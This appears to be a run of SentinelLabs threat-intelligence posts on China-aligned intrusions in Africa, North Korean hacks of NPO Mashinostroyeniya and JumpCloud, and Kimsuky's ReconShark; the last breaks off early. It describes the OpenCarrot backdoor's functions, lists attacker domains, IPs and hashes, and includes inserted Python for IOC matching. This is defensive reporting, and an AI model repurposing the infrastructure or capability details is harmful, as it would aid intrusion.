Offensive Cyber Operations as a Support Tool of Soft Power Agendas

In recent years, we have tracked targeted intrusions against key industrial sectors in various African nations. These attacks conspicuously align with China’s broader soft power and technological agenda in the region, focusing on critical areas such as the telecommunication sector, financial institutions, and governmental bodies. Three significant sets of activity best exemplify this dynamic across the larger set of China-aligned activity in Africa.

Operation Tainted Love

In March 2023, we shared details of Operation Tainted Love, a case centered on targeted attacks against telecommunications providers predominantly located in the Greater Middle East region. This discovery marked an evolution of the toolkit involved in Operation Soft Cell, forging immediate connections to previous China-attributed activities.

From Operation Tainted Love, we highlighted the use of a rigorously maintained and version-controlled credential theft toolset, accompanied by a novel dropper mechanism. The overall findings suggest a concerted development effort, undertaken by a threat actor or by a threat actor’s support structure, driven by specific objectives.

Operation Tainted Love

Unnoted in our initial report, we identified the compromise of a telecommunications entity based in North Africa by the same threat actor. The timing of this activity aligned closely with Chinese telecommunication soft power interests in Africa, as the organization was in private negotiations for further regional expansion. The strategic objectives of such intrusions point to China’s interest in internal business knowledge on negotiations, providing a competitive advantage, or prepositioning retained technical access for intelligence collection.

Backdoor Diplomacy

For several years, another APT primarily referred to as BackdoorDiplomacy has operated across Africa. Recently, fresh revelations emerged spotlighting the group’s sustained three-year endeavor targeting governmental organizations in Kenya. Delving into prior public technical reports by ESET, Unit42, and BitDefender unveils a targeting paradigm bearing resemblance to those employed in Operation Tainted Love.

BackdoorDiplomacy seemingly concentrates efforts on government entities, along with high-priority telecommunications and finance organizations. The group has orchestrated a series of notable espionage campaigns across Africa in recent years. Through analysis of infrastructure tied to this actor, we assess that multiple African countries have experienced targeting over the last few years, including at least South Africa, Kenya, Senegal, and Ethiopia. As noted by previous reporting, the threat actor does maintain operations throughout the Middle East, and can be found in other regions of particular PRC interest.

Our current perspective suggests a close relationship between BackdoorDiplomacy and another Chinese state sponsored threat actor, APT15.

Threat Actor Ambiguity

A broader set of China-aligned campaigns has been active across Africa, as emphasized by recent reports on FamousSparrow and Earth Estries. Pinpointing precise clustering for these groups remains challenging due to a prevalence of shared technical resources. However, TTPs and targeting objectives are somewhat related to the APT41 umbrella.

In a separate case, Chinese espionage efforts against the African Union (AU) were allegedly discovered in 2017. According to initial reports, for a period of five years, from 2012 to 2017, the Chinese government maintained backdoor access into servers at the African Union’s headquarters in Ethiopia. The $200 million headquarters was funded and built by China between 2009 and 2012. Notably, the network infrastructure and services were reportedly Huawei technology since the initial construction.

African Union Headquarters, Addis Ababa

More recently in 2020, Japan’s CERT notified AU IT staff of an intrusion they attributed to the Bronze President APT, a separately tracked Chinese threat actor. In this intrusion, Bronze President was observed exfiltrating surveillance footage from the AU headquarters facility. This case may highlight how much of a real priority intelligence inside the AU is to Beijing, ultimately forcing their hand on moving away from backdoored equipment to performing actual intrusions through well tracked APTs.

In both the 2017 and 2020 cases, African Union and Chinese officials denied any sort of intrusion. As quoted by Reuters, a former AU official told them, “Attacking the Chinese, for us, it’s a very bad idea.” A review of specifics around China’s technological soft power in Africa highlights some reasons why the official may have said that.

Technological Soft Power, Reliance, and Abuse Opportunities

The digital landscape of Africa has undergone a seismic transformation, largely facilitated through Chinese tech giants deploying extensive resources to meet the continent’s critical technological needs.

China has taken a lead role in Africa’s telecommunication, finance, and surveillance technology sectors. This initiative ties into China’s Digital Silk Road project, announced in 2015.

Telecommunication Networks

At the forefront of technology investment in Africa are Huawei and ZTE, powerhouses steering efforts to bridge the connectivity divide separating urban and rural landscapes of the continent. These corporations have brought the boon of digital connectivity to the remotest corners of Africa.

In the two decades since Huawei began expanding into Africa, it has grown to become the leading telecommunication technology and service provider across much of the continent.

Yet, underneath the altruistic veneer may lie a strategy anchored on fostering an overwhelming dependence on Chinese technology. Through a sweeping range of initiatives that span from mobile networks to broadband infrastructure, the strategy envisions a society deeply tied to China’s digital ecosystem, guiding future socio-political paths and holding significant sway over personal freedoms.

This rise isn’t merely a route to economic enrichment; it empowers China to shape policies and narratives aligned with its geostrategic ambitions, establishing itself as a pivotal and defining force in Africa’s digital evolution. Targeted intrusions by the BackdoorDiplomacy APT and the threat group orchestrating Operation Tainted Love indicate a level of intention directed at supporting such agendas.

Instances of infringement on internet rights and the misuse of technology are already evident in countries such as Sudan, Ethiopia, Zimbabwe, Gabon, and the Democratic Republic of Congo. In some of these nations, governments have resorted to shutting down social media and internet services as a strategy to suppress civil unrest, or even to spying on the network communications of their citizens.

China has also ventured to enhance its command over the underwater fiber networks connected to the African continent. Leveraging significant investments in projects such as the PEACE cable initiative, China has been laying cables that aim to rejuvenate Africa’s digital connectivity, ostensibly offering the continent much needed information accessibility.

Peace Cable Map, TeleGeography

These underwater pathways hold enormous significance in dictating the flow of information between continents. In taking ownership of them, China stands in a position to potentially orchestrate and steer digital dialogues on the African continent, forging a narrative that aligns seamlessly with its geopolitical objectives.

Controlling these undersea networks gives China the capacity to monitor the data flowing through them, raising serious concerns regarding data privacy and national sovereignty. To gauge the potential for misuse, we only need to examine how China manages its own domestic networks, offering a window into the possible ramifications of granting them such control.

Mobile Payment Platforms

In recent years, digital mobile banking platforms like M-Pesa have revolutionized Africa’s financial landscape, promoting unprecedented financial inclusion especially in areas underserved by traditional banks. With 51 million users processing over $314 billion in transactions annually, its footprint is substantial.

M-Pesa has since been migrated to Huawei’s Mobile Money Platform. Similarly, China-backed entities OPay and PalmPay have seized a considerable market share, facilitating a large portion of the continent’s financial transactions.

This should raise apprehensions around the nature of China’s influence, with potential avenues for financial monopolies and the control it gives to Chinese stakeholders in the dictation of economic trajectories across the African continent.

The intensive data mining, user surveillance, and user disruption that are characteristic of Chinese tech giants present a significant risk of exploitation, infringing upon the privacy rights of individuals and potentially undermining the sovereignty of African nations. The depth and breadth of data these platforms can amass and control raise serious concerns about how it might be utilized, perhaps to shape consumer behavior, influence public opinion, or even foster dependencies that go beyond financial transactions.

While the services offered by these platforms are undeniably bringing about a financial revolution, they are creating a scenario where a foreign power has overwhelming influence over the financial stability, habits, and preferences of a significant portion of the African populace. Financial inclusion and potential manipulation hang in a precarious balance, necessitating a critical appraisal of the long-term implications of this growing influence.

Surveillance

Huawei’s Smart City venture is also emerging as a central pillar in China’s escalating soft power influence in Africa. This initiative pivots on a suite of surveillance services including facial recognition, artificial intelligence, data analytics, and 5G network deployments, all claimed to enhance urban management, augment public safety, and spur economic development. Yet, the flipside of this technological investment is the possibility of a surveillance era of unparalleled scope, exploiting a diverse array of data from daily life to cultivate a society where personal privacy could soon become obsolete.

Across Africa, nations like Kenya, Mauritius, Uganda, and Zambia have embraced Huawei, infusing surveillance technology into the heartbeat of their urban landscapes. In Kenya, the Safe City project — powered by Huawei’s system encompassing CCTV and facial recognition technologies — monitors Nairobi and other primary cities. In Uganda, one such case of surveillance reportedly led to the regime seeking to silence political opponent Bobi Wine, accomplished through the help of Huawei staff and services. These same capabilities can be found in many other countries throughout Africa.

Bobi Wine, source: Bloomberg

Other noteworthy activity includes the Chinese business CloudWalk Technology providing facial recognition surveillance technology to Zimbabwe. CloudWalk has been accused of being involved in human rights violations and transgressions perpetrated during China’s campaign targeting Uighurs, ethnic Kazakhs, and other Muslim minority groups in the Xinjiang Uighur Autonomous Region. This campaign is characterized by widespread repression, indiscriminate detentions, enforced labor, and intensive high-tech surveillance.

Once these smart cities come to fruition, they will operate fundamentally on Chinese technology, often granting Beijing real-time insights into these nations with little regard for personal privacy and national safeguarding measures. Moreover, these nations steer towards further reliance on Chinese expertise and technical resources for the use and administration of these systems into the future.

A Force for Good

African nations face the delicate task of leveraging Chinese tech innovations while preserving their autonomy and digital rights, a tightrope walk exacerbated by limited alternatives. Concurrently, it’s imperative for the cybersecurity community to deepen our understanding of China’s cyber activities in Africa to prevent unwanted encroachment.

Due to escalating cyber threats in overlooked areas such as Africa and Latin America, we are launching the Undermonitored Regions Working Group (URWG). This initiative is focused on addressing the unique cybersecurity hurdles faced in these regions, frequently sidelined in mainstream global cyber discussions.

Our mission transcends geographical boundaries as we track state-sponsored threats emerging globally from nations such as China, Russia, or Egypt. We are determined to cultivate a technical research collaboration, harnessing our collective expertise to identify new threats, and devise effective countermeasures against them.

SentinelLabs embodies our commitment to sharing openly – providing tools, context, and insights to strengthen our collective mission of a safer digital life for all. We are seeking out security researchers, intelligence analysts, and those passionate about understanding and improving the cyber threat narrative to grow these efforts through unconventional means. By pooling our knowledge and technical prowess, we strive to nurture a digital future in support of less monitored parts of the world.

Conclusion

As we have navigated through the complexities of Chinese influence in Africa, the role of offensive cyber actions, and the broader implications of tech dominance, it becomes evident that this intricate web of geopolitics and cyber threats demands attention across the cybersecurity industry.

Recognizing Africa’s centrality in the future of global cyber dynamics helps not only the safeguarding of the continent’s digital freedoms but fortifies the global ecosystem against sophisticated threat actors.

The story of Africa’s digital landscape today is, in essence, the precursor to the global narrative of tomorrow. We should work in tandem to craft it as one of security, prosperity, and shared progress.

Comrades in Arms? | North Korea Compromises Sanctioned Russian Missile Engineering Company

By: Tom Hegel
7 August 2023 at 09:58

By Tom Hegel and Aleksandar Milenkoski

Executive Summary

  • SentinelLabs identified an intrusion into the Russian defense industrial base, specifically a missile engineering organization NPO Mashinostroyeniya.
  • Our findings identify two instances of North Korea-related compromise of sensitive internal IT infrastructure within this same Russian DIB organization, including a specific email server, alongside use of a Windows backdoor dubbed OpenCarrot.
  • Our analysis attributes the email server compromise to the ScarCruft threat actor. We also identify the separate use of a Lazarus Group backdoor for compromise of their internal network.
  • At this time, we cannot determine the potential nature of the relationship between the two threat actors. We acknowledge a potential sharing relationship between the two DPRK-affiliated threat actors as well as the possibility that tasking deemed this target important enough to assign to multiple independent threat actors.

Background

North Korean threat actors have caught our attention over the past year, providing us with fruitful insight into a variety of campaigns, such as new reconnaissance tools, (multiple) new supply chain intrusions, elusive multi-platform targeting, and new sly social engineering tactics. To add to that list, let’s take a look at an intrusion into what might be considered a highly desirable strategic espionage mission – supporting North Korea’s contentious missile program.

The Target Organization

While conducting our usual hunting and tracking of suspected-North Korean threat actors, we identified a leaked email collection containing an implant with characteristics related to previously reported DPRK-affiliated threat actor campaigns. A thorough investigation of the email archive revealed a larger intrusion, not fully recognized at the time by the compromised organization.

The victim organization is NPO Mashinostroyeniya (JSC MIC Mashinostroyenia, NPO Mash), a leading Russian manufacturer of missiles and military spacecraft. The organization’s parent company is JSC Tactical Missiles Corporation KTRV (Russian: АО «Корпорация Тактическое Ракетное Вооружение», КТРВ). NPO Mashinostroyeniya is a sanctioned entity that possesses highly confidential intellectual property on sensitive missile technology currently in use and under development for the Russian military.

We are highly confident that the emails related to this activity originate from the victim organization. Furthermore, there are no discernible signs of manipulation or technically verifiable inaccuracies present in these emails. It’s essential to highlight that the leaked data comprises a substantial volume of emails unrelated to our current research scope. This suggests that the leak was likely accidental or resulted from activity unrelated to the specific intrusion under scrutiny in our investigation. However, this collection provides valuable background context for our understanding of their internal network design, security gaps, and even cases of activity by other attackers.

Example of unrelated email alerts from Russian CERT to NPO Mash

In mid-May 2022, roughly a week prior to Russia vetoing a U.N. resolution to impose new sanctions on North Korea for intercontinental ballistic missile launches that could deliver nuclear weapons, the victim organization internally flagged the intrusion. Internal NPO Mashinostroyeniya emails show IT staff exchanged discussions highlighting questionable communications between specific processes and unknown external infrastructure. The same day, the NPO Mashinostroyeniya staff also identified a suspicious DLL file present in different internal systems. The month following the intrusion, NPO Mashinostroyeniya engaged with their AV solution’s support staff to determine why this and other activity was not detected.

Following an examination of the emails and an in-depth investigation into the two separate sets of suspicious activity, we have successfully established a correlation between each cluster of activity and a respective threat actor amounting to a more significant network intrusion than the victim organization realized.

North Korean Overlap

During our investigation, we identified the suspicious file in question to be a version of the OpenCarrot Windows OS backdoor, previously identified by IBM X-Force as part of Lazarus group activities. As a feature-rich, configurable, and versatile backdoor, the malware is a strong enabler of the group’s operations. With a wide range of supported functionality, OpenCarrot enables full compromise of infected machines, as well as the coordination of multiple infections across a local network. The OpenCarrot variant we analyzed supports proxying C2 communication through internal network hosts as well as directly to the external server, which supports the strong possibility of a network-wide compromise.

Additionally, we discovered the suspicious network traffic discussed in emails is the compromise of the business’ Linux email server, hosted publicly at vpk.npomash[.]ru (185.24.244[.]11). At time of discovery, the email server was beaconing outbound to infrastructure we now attribute to the ScarCruft threat actor. ScarCruft is commonly attributed to North Korea’s state-sponsored activity, targeting high value individuals and organizations near-globally. The group is also referred to as Inky Squid, APT37, or Group123, and often showcases a variety of technical capabilities for their intrusions. While we are unable to confirm the initial access method and implant running on the email server at time of discovery, we link malware loading tools and techniques involving this set of infrastructure to those seen in previously reported ScarCruft activity using the RokRAT backdoor.

This intrusion gives rare insight into sensitive DPRK cyberespionage campaigns, and an opportunity to expand our understanding of the relationship and goals between various North Korean cyber threat actors. It also highlights a potential rift in relations between Russia and North Korea, considering their growing relationship.

This engagement establishes connections between two distinct DPRK-affiliated threat actors, suggesting the potential for shared resources, infrastructure, implants, or access to victim networks. Moreover, we acknowledge the possibility that the assigned task of an intrusion into NPO Mashinostroyeniya might have warranted targeting by multiple autonomous threat actors due to its perceived significance.

OpenCarrot Backdoor Activity

The OpenCarrot sample we analyzed is implemented as a Windows service DLL file, intended to execute in a persistent manner. In line with typical practices of the Lazarus group, OpenCarrot is subject to continuous, not necessarily incremental, changes. The file has a compilation timestamp of Wednesday, Dec. 01, 2021. Although the timestamp could have been manipulated by the threat actors, given the proximity to the May 2022 suspected intrusion date, it’s likely that the timestamp is authentic. Our confidence in this assessment also increases through the infrastructure analysis below.

The OpenCarrot variant we analyzed implements over 25 backdoor commands with a wide range of functionality representative of Lazarus group backdoors. In this case, supported functionality includes:

  • Reconnaissance: File and process attribute enumeration, scanning and ICMP-pinging hosts in IP ranges for open TCP ports and availability.
  • Filesystem and process manipulation: Process termination, DLL injection, and file deletion, renaming, and timestomping.
  • Reconfiguration and connectivity: Managing C2 communications, including terminating existing and establishing new comms channels, changing malware configuration data stored on the filesystem, and proxying network connections.

The OpenCarrot sample displays further characteristics often seen among Lazarus Group malware.

Its backdoor commands are indexed by consecutive integers, a common trait of Lazarus group malware. In addition to integer-indexed commands, the developers implement string-indexed sub-commands.

Backdoor command indexing

Keeping with their typical mode of operations, the malware is intended to execute as a Windows service and exports the ServiceMain function.

OpenCarrot implements executable code in a section named .vlizer indicating the use of code virtualization for obfuscation. The .vlizer section is associated with the Oreans Code Virtualizer code protection platform, a functional subset of Themida. As previously observed in Themida-protected Lazarus group malware, some code segments of the OpenCarrot variant we analyzed are not protected.

As part of its initialization process, OpenCarrot ingests configuration data from a file whose name is composed of the service name in whose context the malware executes and the dll.mui extension. The configuration data contains encryption-protected C2 information. The use of configuration files with the dll.mui extension is a long-standing theme among Lazarus group malware, mimicking a lesser-known standard Windows file extension used to denote application resources and externalities.

OpenCarrot implements relatively long sleep time periods. To avoid remaining idle for too long whenever the user of the infected machine is active, OpenCarrot implements a mechanism to exit its sleep state earlier than instructed. If the malware is instructed to sleep for 15 seconds or more, it then monitors in 15 second intervals for the insertion of new drives, such as USBs. If such an event occurs, the malware exits its sleep state before the configured sleep time elapses. A variant of this technique has been previously observed in the Pebbledash malware.

Disk drive monitoring

OpenCarrot’s versatility is evident with its support of multiple methods for communicating with C2 servers. The malware dispatches commands for execution based on attacker-provided data originating not only from remote C2 servers, but also from local processes through named pipes and incoming connections to a TCP port on which OpenCarrot listens.

Infrastructure Analysis

North Korean-nexus threat actors are known for not maintaining the OPSEC of their campaigns. A characteristic lack of segmentation allows researchers to amass unique insights across a variety of unreported activity. Infrastructure connections in particular often allow us to track the evolution of their campaigns over long periods of time.

We link the NPO Mashinostroyeniya email discussing suspicious network communication to active C2 communications occurring through 192.169.7[.]197 and 5.134.119[.]142. The internal host, the organization’s Red Hat email server, was actively compromised and in communication with the attackers’ malicious infrastructure. A review of all details concludes the threat actor was likely operating on this server for an extensive period of time prior to the internal team’s discovery.

Email between NPO Mash Employees sharing beaconing process details

This set of malicious infrastructure was served via CrownCloud (Australia) and OhzCloud (Spain) VPS hosting providers. During the intrusion, the two domains centos-packages[.]com and redhat-packages[.]com were resolving to those C2 IP addresses. Our assessment is that this particular cluster of infrastructure became active in November 2021, and was immediately paused the same day of NPO Mashinostroyeniya’s intrusion discovery in May 2022. This finding may indicate the intrusion was high priority and closely monitored by the operators.

Infrastructure and Timeline

A relationship can be observed between this cluster of activity and a more recent ScarCruft campaign. After the intrusion operators immediately shut down their C2 server when the victim identified the suspicious traffic in May 2022, use of the centos-packages[.]com domain was paused until it began resolving to 160.202.79[.]226 in February 2023. 160.202.79[.]226 is a QuickPacket VPS (US) hosting IP also being shared with the domain dallynk[.]com and others used by ScarCruft for malware delivery and C2 initiated through malicious documents.

Further, the domain dallynk[.]com follows the theme we’ve previously reported in which DPRK-associated threat actors impersonate Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea.

The collection of activity stemming from the dallynk[.]com domain contains malware loading tools and techniques matching those seen in previously reported ScarCruft activity using the RokRAT backdoor. Similarities in server configuration history can also link to lower-confidence BlueNoroff relationships.

Infrastructure ScarCruft Link

While conducting this research, we first publicly identified the link between the JumpCloud intrusion and North Korean threat actors. One detail that immediately struck us was the domain theme similarities, such as centos-pkg[.]org / centos-repos[.]org (JumpCloud), and centos-packages[.]com (NPO Mash). This detail is superficial and not strong enough alone to base direct clustering, but alongside other aforementioned North Korean threat actor connections, it stokes our curiosity for the particulars of the threat actors’ infrastructure creation and management procedures.

Lastly, we advise particular care into how this infrastructure is further attributed when reviewed historically. For example, the C2 server IP address 192.169.7[.]197 was used between January and May 2022 by the DPRK linked threat actor; however, that same IP was used by the Arid Viper/Desert Falcon APT in 2020, first reported by Meta Threat Investigators. Arid Viper is associated with Palestinian interests, conducting activity throughout the Middle East. We assess the Arid Viper activity is unrelated to our findings and the overlap of infrastructure is simply an example of commonly reused dubious VPS hosting providers. This further highlights the importance of associating active timeframes with IP-based indicators.
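The timeframe caveat above, and the defanged indicators in the list that follows, lend themselves to a small worked example. The code below is an added illustration and not code from the SentinelLabs report: it refangs indicators written in the report's `[.]` / `[@]` style, stores each IP indicator together with the window in which the named actor used it, and only attributes a log event to an actor when the event's timestamp falls inside that window. The windows for 192.169.7[.]197 follow the text (DPRK-linked use between January and May 2022; Arid Viper use in 2020, for which the post gives no exact dates, so the full year is assumed). The firewall log lines and their key=value format are constructed for the example.

```python
import re
from datetime import date, datetime


def refang(value: str) -> str:
    """Turn a defanged indicator as printed in the report back into a usable value.

    "185.24.244[.]11" -> "185.24.244.11", "vpk.npomash[.]ru" -> "vpk.npomash.ru",
    "user[@]protonmail[.]com" -> "user@protonmail.com".
    """
    return value.replace("[.]", ".").replace("[@]", "@")


# Each IP indicator carries the window in which the named actor used it. The windows
# follow the report: 192.169.7[.]197 was DPRK-linked C2 between January and May 2022 and
# was used by Arid Viper in 2020 (no exact 2020 dates are given; the full year is assumed).
INDICATORS = [
    {"ip": refang("192.169.7[.]197"), "actor": "DPRK (ScarCruft-linked)",
     "active_from": date(2022, 1, 1), "active_to": date(2022, 5, 31)},
    {"ip": refang("192.169.7[.]197"), "actor": "Arid Viper",
     "active_from": date(2020, 1, 1), "active_to": date(2020, 12, 31)},
]

# Constructed firewall log lines (not real traffic) in an assumed key=value format.
LOG_LINES = [
    "2020-06-14T08:12:03Z fw01 OUTBOUND src=10.0.4.21 dst=192.169.7.197 dport=443",
    "2022-03-02T21:47:10Z fw01 OUTBOUND src=10.0.4.21 dst=192.169.7.197 dport=443",
    "2022-03-02T21:47:11Z fw01 OUTBOUND src=10.0.4.21 dst=203.0.113.5 dport=443",
    "2023-01-09T11:05:44Z fw01 OUTBOUND src=10.0.4.9 dst=192.169.7.197 dport=80",
]

LOG_RE = re.compile(r"^(\S+) \S+ OUTBOUND src=(\S+) dst=(\S+) dport=(\d+)$")


def attribute_event(dst_ip: str, when: date, indicators=INDICATORS):
    """Return (matched, actor).

    matched is True when dst_ip is a known indicator at all; actor is the actor whose
    active window covers the event date, or None when no window does.
    """
    candidates = [i for i in indicators if i["ip"] == dst_ip]
    if not candidates:
        return False, None
    for ind in candidates:
        if ind["active_from"] <= when <= ind["active_to"]:
            return True, ind["actor"]
    return True, None


def match_events(log_lines, indicators=INDICATORS):
    """Scan log lines and return (timestamp, dst_ip, actor) for every hit on an indicator IP.

    Hits outside every known window are kept with actor=None, so the analyst still sees
    them but the alert does not claim an attribution the indicator's history cannot support.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, dst = m.group(1), m.group(3)
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").date()
        matched, actor = attribute_event(dst, when, indicators)
        if matched:
            hits.append((ts, dst, actor))
    return hits


if __name__ == "__main__":
    for ts, dst, actor in match_events(LOG_LINES):
        print(f"{ts} dst={dst} actor={actor or 'unattributed (outside known windows)'}")
```

Run against the constructed lines, the 2020 connection attributes to Arid Viper, the March 2022 connection to the DPRK-linked cluster, and the 2023 connection to nobody: the IP is still worth a look, but nothing on this page supports naming an actor for it.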

Conclusion

With a high level of confidence, we attribute this intrusion to threat actors independently associated with North Korea. Based on our assessment, this incident stands as a compelling illustration of North Korea’s proactive measures to covertly advance their missile development objectives, as evidenced by their direct compromise of a Russian Defense-Industrial Base (DIB) organization.

The convergence of North Korean cyber threat actors represents a profoundly consequential menace warranting comprehensive global monitoring. Operating in unison as a cohesive cluster, these actors consistently undertake a diverse range of campaigns motivated by various factors. In light of these findings, it becomes crucial to address and mitigate this threat with utmost vigilance and strategic response.

Indicators

MD5:
9216198a2ebc14dd68386738c1c59792
6ad6232bcf4cef9bf40cbcae8ed2f985
d0f6cf0d54cf77e957bce6dfbbd34d8e
921aa3783644750890b9d30843253ec6
99fd2e013b3fba1d03a574a24a735a82
0b7dad90ecc731523e2eb7d682063a49
516beb7da7f2a8b85cb170570545da4b

SHA1:
07b494575d548a83f0812ceba6b8d567c7ec86ed
2217c29e5d5ccfcf58d2b6d9f5e250b687948440
246018220a4f4f3d20262b7333caf323e1c77d2e
8b6ffa56ca5bea5b406d6d8d6ef532b4d36d090f
90f52b6d077d508a23214047e680dded320ccf4e
f483c33acf0f2957da14ed422377387d6cb93c4d
f974d22f74b0a105668c72dc100d1d9fcc8c72de

redhat-packages[.]com
centos-packages[.]com
dallynk[.]com
yolenny[.]com
606qipai[.]com
asplinc[.]com
bsef.or[.]kr

192.169.7[.]197
160.202.79[.]226
96.9.255[.]150
5.134.119[.]142

JumpCloud Intrusion | Attacker Infrastructure Links Compromise to North Korean APT Activity

By: Tom Hegel
20 July 2023 at 10:00

In recent news, the cloud-based IT management service JumpCloud publicly shared details gathered from the investigation into an intrusion on their network. Alongside the updated details, the organization shared a list of associated indicators of compromise (IOCs), noting attribution to an unnamed “sophisticated nation-state sponsored threat actor”.

Reviewing the newly released indicators of compromise, we associate the cluster of threat activity with a North Korean state-sponsored APT. The IOCs are linked to a wide variety of activity we attribute to the DPRK, overall centered on the supply chain targeting approach seen in previous campaigns.

Infrastructure Analysis

Based on the IOCs shared by JumpCloud, we were able to analyze the threat actor’s infrastructure. The following list is our starting point:

Domains

alwaysckain.com
canolagroove.com
centos-pkg.org
centos-repos.org
datadog-cloud.com
datadog-graph.com
launchruse.com
nomadpkg.com
nomadpkgs.com
primerosauxiliosperu.com
reggedrobin.com
toyourownbeat.com
zscaler-api.org

IP Addresses

51.254.24.19
185.152.67.39
70.39.103.3
66.187.75.186
104.223.86.8
100.21.104.112
23.95.182.5
78.141.223.50
116.202.251.38
89.44.9.202
192.185.5.189
162.241.248.14
179.43.151.196
45.82.250.186
162.19.3.23
144.217.92.197
23.29.115.171
167.114.188.40
91.234.199.179

By mapping out this infrastructure, it is possible to show the links between the diverse set of IP addresses and pick up various patterns.

Triggering alerts on 192.185.5[.]189 alone is ill advised, as it’s a shared hosting server for many domains and not an indicator of malicious activity by itself. However, toyourownbeat[.]com shares an SSL certificate with skylerhaupt[.]com, indicating a potential relationship in ownership.

The indicator 144.217.92[.]197 shared by JumpCloud does not host any domains from the list they shared, but we can see one similar through the use of passive DNS data: npmaudit[.]com, which was also just recently shared by GitHub in an alert of their own.

Based on public details available as of this writing, it’s unclear if the GitHub alert originated from the JumpCloud incident or if they are separate efforts by the same attacker.

Infrastructure Map Noting JumpCloud links

Moving on to IP address 23.29.115[.]171, we can see through PDNS data that the domain npm-pool[.]org is related. Notably, this domain is quite similar to the NPM theme of domains shared in the GitHub alert.

Infrastructure Map Noting JumpCloud and GitHub Overlap

While the following is not a strong indicator of attribution alone, it’s noteworthy that specific patterns in how the domains are constructed and used follow a similar pattern to other DPRK linked campaigns we track. Indicators with suspected actor association, but unverified as of this writing, include junknomad[.]com and insatageram[.]com (registered with jeanettar671belden[@]protonmail[.]com).

Additional pivots of potential interest can be made through other IPs, including 167.114.188[.]40, and to a variety of low confidence attacker-associated infrastructure.
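The passive DNS pivots described above, together with the shared-hosting caveat for 192.185.5[.]189, can be expressed as a short procedure. The following is an added example and not code from SentinelLabs or JumpCloud: it expands seed IPs to their co-hosted domains, refuses to treat an IP with many co-hosted domains as a pivot on its own, and only on non-shared hosts flags co-hosted domains that match the NPM/package naming theme the post calls out. The (domain, IP) pairs explicitly named in the post are reused (npmaudit[.]com on 144.217.92[.]197, npm-pool[.]org on 23.29.115[.]171); the `tenantNN.example` domains are invented filler standing in for the unrelated tenants on the shared host, and placing toyourownbeat[.]com on that host is an assumption made for the illustration. The threshold of 10 co-hosted domains is likewise an assumed tuning value.

```python
# Constructed passive-DNS style (domain, ip) records. The explicit pairs from the post are
# reused; the "tenantNN.example" domains are invented filler for the shared host, and
# toyourownbeat.com is placed on 192.185.5.189 as an assumption for this example only.
PDNS_RECORDS = [
    ("npmaudit.com", "144.217.92.197"),
    ("npm-pool.org", "23.29.115.171"),
    ("toyourownbeat.com", "192.185.5.189"),
] + [(f"tenant{i:02d}.example", "192.185.5.189") for i in range(40)]

# Above this many co-hosted domains an IP is treated as shared hosting (assumed tuning):
# the IP is then too weak to alert on, and its neighbours are not indicators by proximity.
SHARED_HOST_THRESHOLD = 10

# Name fragments matching the domain theme the post associates with this activity.
THEME_KEYWORDS = ("npm", "pkg", "package", "repos")


def domains_on_ip(records, ip):
    """All domains observed resolving to ip, sorted for stable output."""
    return sorted({domain for domain, addr in records if addr == ip})


def is_shared_hosting(records, ip, threshold=SHARED_HOST_THRESHOLD):
    """True when more than `threshold` distinct domains have resolved to ip."""
    return len(domains_on_ip(records, ip)) > threshold


def theme_matches(domains, keywords=THEME_KEYWORDS):
    """Domains whose name contains one of the theme keywords, sorted."""
    return sorted(d for d in domains if any(k in d.lower() for k in keywords))


def pivot(records, seed_ips, threshold=SHARED_HOST_THRESHOLD):
    """Expand each seed IP to its co-hosted domains.

    Shared hosts are labelled so the analyst knows which expansions are pivots worth
    following and which are neighbourhood noise; themed co-hosted domains are only
    reported for non-shared hosts, where co-hosting actually strengthens the link.
    """
    result = {}
    for ip in seed_ips:
        domains = domains_on_ip(records, ip)
        shared = len(domains) > threshold
        result[ip] = {
            "shared": shared,
            "domains": domains,
            "themed": [] if shared else theme_matches(domains),
        }
    return result


if __name__ == "__main__":
    seeds = ["144.217.92.197", "23.29.115.171", "192.185.5.189"]
    for ip, info in pivot(PDNS_RECORDS, seeds).items():
        tag = "shared host, do not alert on IP alone" if info["shared"] else "pivot candidate"
        print(f"{ip}: {tag}; {len(info['domains'])} domain(s); themed={info['themed']}")
```

On the constructed data the two dedicated IPs each yield one themed domain, while 192.185.5[.]189 is reported as a shared host with no themed expansion, which is the behaviour an analyst wants before any of these neighbours are promoted to indicators.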

Following the profile of the associated infrastructure from both the JumpCloud intrusion and the GitHub security alert, we can expand to further associated threat activity. For example, we can see clear links to other NPM and “package” themed infrastructure we associate with high to medium confidence, as noted in the list below. This list further expands thanks to the findings and blog from Phylum in late June.

npmjscloud[.]com
npmcloudjs[.]com
nodepkg[.]com
dadiwarm[.]com
216.189.145[.]247
npmjsregister[.]com
142.44.178[.]222
tradingprice[.]net
bi2price[.]com

Trivial pivots from here can be made to similar behaving infrastructure linked to TraderTraitor, as noted by GitHub, plus those of AppleJeus such as Celas Trade Pro via celasllc[.]com.

Conclusion

It is evident that North Korean threat actors are continuously adapting and exploring novel methods to infiltrate targeted networks. The JumpCloud intrusion serves as a clear illustration of their inclination towards supply chain targeting, which yields a multitude of potential subsequent intrusions. The DPRK demonstrates a profound understanding of the benefits derived from meticulously selecting high-value targets as a pivot point to conduct supply chain attacks into fruitful networks.

Kimsuky Evolves Reconnaissance Capabilities in New Global Campaign

By: Tom Hegel
4 May 2023 at 13:55

By Tom Hegel and Aleksandar Milenkoski

Executive Summary

  • SentinelLabs has observed ongoing attacks from Kimsuky, a North Korean state-sponsored APT that has a long history of targeting organizations across Asia, North America, and Europe.
  • Ongoing campaigns use a new malware component we call ReconShark, which is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros.
  • ReconShark functions as a reconnaissance tool with unique execution instructions and server communication methods. Recent activity has been linked to a wider set of activity we confidently attribute to North Korea.

Background

Kimsuky is a North Korean advanced persistent threat (APT) group with a long history of targeted attacks across the world. Current understanding of the group indicates they are primarily assigned to intelligence collection and espionage operations in support of the North Korean government since at least 2012. In 2018 the group was observed deploying a malware family dubbed BabyShark, and our latest observations indicate the group has evolved the malware with an expanded reconnaissance capability – we refer to this BabyShark component as ReconShark.

Targeted Organizations

Historically, Kimsuky targets have been located across countries in North America, Asia, and Europe. In the group's latest campaigns, they continue their global targeting themed around various ongoing geopolitical topics. For example, the latest Kimsuky campaigns have focused on nuclear agendas between China and North Korea, relevant to the ongoing war between Russia and Ukraine.

